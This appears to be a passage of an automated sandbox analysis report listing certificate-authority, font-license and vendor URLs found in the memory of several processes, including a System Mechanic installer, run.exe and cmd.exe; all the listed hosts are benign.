Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://compositewpf.codeplex.com/
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: freebl3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://download.iolo.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3244115151.0000021719341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
Source: run.exe, run.exe, 00000003.00000000.2099921681.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000002.2166899823.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000000.2585114842.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000002.2691006504.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr	String found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp, u2ts.3.exe, 00000006.00000000.2151539522.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://google.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: freebl3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: run.exe, 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, run.exe, 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
